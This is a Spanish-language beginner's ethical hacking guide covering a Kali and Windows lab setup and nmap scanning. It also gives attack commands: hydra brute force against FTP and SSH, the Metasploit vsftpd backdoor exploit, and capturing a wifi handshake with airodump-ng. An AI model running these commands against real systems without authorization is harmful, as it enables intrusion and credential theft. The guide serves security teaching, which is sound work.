🔐 Guía Definitiva de Hacking Ético para Principiantes

⚠️ Advertencia Legal y Ética

Todas las técnicas aquí descritas deben usarse exclusivamente en:

Tus propios sistemas y redes
Sistemas con permiso explícito por escrito
Entornos de laboratorio controlados

El acceso no autorizado a sistemas informáticos es un delito en la mayoría de países.

📚 Glosario de Términos Esenciales

Pentesting (Pruebas de Penetración)

Evaluación autorizada de la seguridad de un sistema mediante la simulación de ataques.

Vulnerabilidad

Debilidad o fallo en un sistema que puede ser explotado para comprometer su seguridad.

Exploit

Código o técnica que aprovecha una vulnerabilidad para obtener acceso no autorizado.

Payload

Código ejecutable que se entrega después de una explotación exitosa.

Fuerza Bruta

Método de prueba de credenciales mediante intentos sistemáticos.

🛠️ Configuración del Entorno de Práctica

Kali Linux

Windows 11

Entornos Virtuales

Instalación de Kali Linux

Descarga la imagen ISO desde kali.org

Crea un USB booteable con Rufus o BalenaEtcher

Instala en máquina virtual (VirtualBox/VMware) o en hardware dedicado

$ sudo apt update && sudo apt upgrade -y # Actualizar sistema
$ sudo apt install -y git curl nmap wireshark # Herramientas básicas

Configuración en Windows 11

Instala Windows Subsystem for Linux (WSL)

PS> wsl --install -d Ubuntu

Instala herramientas básicas

PS> winget install nmap wireshark

Laboratorio Virtual Recomendado

Kali Linux: Sistema ofensivo
Metasploitable2: Blanco de práctica
Windows 10 Vulnerable: Para AD y redes Windows

# Configurar red en VirtualBox:
1. Archivo > Preferencias > Red
2. Crear nueva red "Host-Only"
3. Asignar a todas las VMs

🔍 Técnicas Básicas de Reconocimiento

Descubrimiento de Red

# En Kali Linux:
$ sudo nmap -sn 192.168.1.0/24 # Escanear hosts activos

# En Windows:
PS> Test-NetConnection -ComputerName 192.168.1.1 -Port 80

Escaneo de Puertos

# Escaneo básico:
$ sudo nmap -sS -T4 192.168.1.1 # SYN Scan (Kali)
PS> nmap -T4 -A 192.168.1.1 # Windows (con Nmap instalado)

# Escanear servicios y versiones:
$ sudo nmap -sV -sC 192.168.1.1

⚔️ Técnicas de Explotación Básica

Fuerza Bruta a Servicios

# FTP (Kali Linux):
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1

# SSH (Windows con Hydra):
PS> hydra -L usuarios.txt -P claves.txt ssh://192.168.1.1

Uso Básico de Metasploit

$ msfconsole
msf6 > search vsftpd # Buscar exploits
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.1
msf6 > exploit

📡 Análisis de Redes WiFi (Ético)

Solo realizar en tu propia red o con permiso explícito por escrito.

Configurar Modo Monitor

$ sudo airmon-ng check kill
$ sudo airmon-ng start wlan0
$ iwconfig # Verificar modo monitor

Escaneo de Redes WiFi

$ sudo airodump-ng wlan0mon

# Capturar handshake (solo en tu red):
$ sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon

🎓 Recursos para Continuar Aprendiendo

Plataforma	Tipo	Nivel	Enlace
TryHackMe	Cursos guiados	Principiante-Intermedio	tryhackme.com
Hack The Box	Máquinas retadoras	Intermedio-Avanzado	hackthebox.com
OverTheWire	Juegos de guerra	Todos los niveles	overthewire.org